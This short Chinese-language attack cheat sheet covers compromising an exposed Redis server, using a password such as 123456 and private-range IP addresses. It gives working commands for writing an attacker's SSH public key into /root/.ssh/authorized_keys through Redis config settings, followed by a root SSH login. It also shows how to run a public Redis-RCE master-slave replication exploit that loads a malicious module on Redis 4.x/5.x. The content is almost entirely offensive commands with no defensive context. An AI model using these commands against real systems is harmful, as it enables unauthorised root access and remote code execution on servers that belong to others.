常用的方法,计划任务,写webshell,主从复制,写公钥文件(会覆盖)
1 写公钥文件
ssh-keygen –t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt
cat test.txt |redis-cli -h 192.168.0.109 -a 123456 -x set crackit
redis-cli -h 192.168.0.109 -a 123456
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
SAVE
ssh -i id_rsa [email protected]
2 主从复制
影响范围:Redis 4.x/5.x
git clone https://github.com/jas502n/Redis-RCE.git
python redis-rce.py -r 192.168.0.109 -p 6379 -L 192.168.0.107 -f exp_lin.so -a 123456